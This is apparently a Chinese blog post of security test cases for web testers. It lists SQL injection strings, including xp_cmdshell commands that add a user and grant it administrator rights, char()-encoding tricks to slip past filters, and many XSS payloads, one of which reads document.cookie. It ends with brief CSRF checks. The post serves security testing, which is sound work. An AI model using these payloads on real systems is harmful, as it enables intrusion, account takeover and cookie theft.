zoukankan      html  css  js  c++  java
  • 常用安全测试用例(二)

    防止SQL注入

    Admin--

    ‘or ­­­--­­

    ‘ and ( ) exec insert * % chr mid

    and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49) ; %20AND%201=2

    ‘and 1=1 ; ‘And 1=1 ; ‘aNd 1=1 ;

    and 1=2 ; ‘and 1=2

    and 2=2

    and user>0

    and (select count(*) from sysobjects)>0

    and (select count(*) from msysobjects)>0

    and (Select Count(*) from Admin)>=0

    and (select top 1 len(username) from Admin)>0(username 已知字段)

    ;exec master..xp_cmdshell “net user name password /add”—

    ;exec master..xp_cmdshell “net localgroup name administrators /add”—

    and 0<>(select count(*) from admin)

    简单的如where xtype=’U’,字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name=’用户’,可以用where name=nchar(29992)+nchar(25143)代替。

    跨站脚本攻击(XSS)

    对于 XSS,只需检查 HTML 输出并看看您输入的内容在什么地方。它在一个 HREF 标记中吗?是否在 IFRAME 标记中?它在 CLSID 标记中吗?在 IMG SRC 中吗?某些 Flash 内容的 PARAM NAME 是怎样的?

    ★~!@#$%^&*()_+<>,./?;'"[]{}-

    ★%3Cinput /%3E

    ★%3Cscript%3Ealert('XSS')%3C/script%3E

    ★<input type="text"/>

    ★<input/>

    ★<input/

    ★<script>alert('xss')</script>

    ★<script>alert('xss');</script>

    ★</script><script>alert(‘xss’)</script>

    ★javascript:alert(/xss/)

    ★javascrip&#116&#58alert(/xss/)

    ★<img src="#" onerror=alert(/xss/)>

    ★<img src="#" style="Xss:expression(alert(/xss/));">

    ★<img src="#"/**/onerror=alert(/xss/) width=100>

    ★=’><script>alert(document.cookie)</script>

    ★1.jpg" onmouseover="alert('xss')

    ★"></a><script>alert(‘xss’);</script>

    ★http://xxx';alert('xss');var/ a='a

    ★’”>xss&<

    ★"onmouseover=alert('hello');"

    ★&{alert('hello');}

    ★>"'><script>alert(‘XSS')</script>

    ★>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>

    ★>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>

    ★AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22

    ★%22%2Balert(%27XSS%27)%2B%22

    ★<table background="javascript:alert(([code])"></table>

    ★<object type=text/html data="javascript:alert(([code]);"></object>

    ★<body onload="javascript:alert(([code])"></body>

    ★a?<script>alert(’Vulnerable’)</script>

    ★<!--'">&:

    var from = ‘$!rundata.Parameters.getString(’from’)';

      var from = ”;hackerFunction(document.cookie);”;

    http://searchbox.mapbar.com/publish/template/template1010 /?CID=qingke&tid=tid1010&cityName=天津<script> alert("hello")</script>&nid=MAPBXITBJRQMYWJRXPCBX

    跨站请求伪造(CSRF)

    同个浏览器打开两个页面,一个页面权限失效后,另一个页面是否可操作成功。

    当页面没有CHECKCODE时,查看页面源代码,查是是否有token。如果页面完全是展示页面,是不会有token的。

  • 相关阅读:
    Java测试用例简介
    Hive使用入门
    Java中的GetOpt操作
    Tomcat的文件列表服务
    Hadoop MapReduce 初步学习总结
    hadoop集群调优-OS和文件系统部分
    02怎么学数据结构?
    01为什么学习数据结构?
    MySQL实战06の锁
    MySQL实战05の索引(下)
  • 原文地址:https://www.cnblogs.com/zgq123456/p/10043106.html
Copyright © 2011-2022 走看看